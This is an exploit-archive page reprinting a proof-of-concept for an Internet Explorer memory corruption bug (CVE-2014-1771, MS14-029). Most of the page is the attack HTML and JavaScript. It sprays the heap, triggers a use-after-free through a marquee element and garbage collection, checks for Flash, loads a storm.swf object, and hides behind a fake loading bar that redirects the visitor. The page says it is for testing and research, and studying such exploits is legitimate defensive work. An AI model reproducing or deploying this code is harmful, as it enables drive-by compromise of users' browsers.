Advertisement






Internet Explorer MS14-029 Memory Corruption PoC

CVE Category Price Severity
CVE-2014-1771 CWE-119 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2014-08-30
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014080141

Below is a copy:

<!doctype html>
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<sc​ript >
func​tion stc()
{
var Then = new Date();
Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
func​tion cid()
{
var swf = 0;
try {
swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
}
if (!swf)
return 0;
var cookieString = new String(document.cookie);
if(cookieString.indexOf("d93kaj3Nja3") == -1)
{stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=func​tion (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=un​escape ("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.create​Element("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
func​tion b2()
{
try{xdd.re​placeNode(document.createTextNode(" "));}catch(exception){}
try{xdd.outerText='';}catch(exception){}
CollectGarbage();
for(i=0;i<3333;i++) ll[i].className=tpx;
}
func​tion a1(){
if (!cid())
return;
document.body.contentEditable="true";
try{xdd.applyElement(document.create​Element("frameset"));}catch(exception){}
try{document.selection.createRange().select();}catch(exception){}
}
</ sc​ript >
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd > </marquee>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
<param name="movie" value="storm.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="true" />
</object>
</body>
<body>
<form name=loading>
¡¡<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>
¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
¡¡¡¡
¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
¡¡¡¡<sc​ript > ¡¡
var bar=0¡¡
var line="||"¡¡
var amount="||"¡¡
count()¡¡
func​tion count(){¡¡
bar=bar+2¡¡
amount =amount + line¡¡
document.loading.chart.value=amount¡¡
document.loading.percent.value=bar+"%"¡¡
if (bar<99)¡¡
{setTimeout("count()",500);}¡¡
else¡¡
{window.location = "http://www.google.com.hk";}¡¡
}</ sc​ript >
¡¡</p>
</form>
<p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
</body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum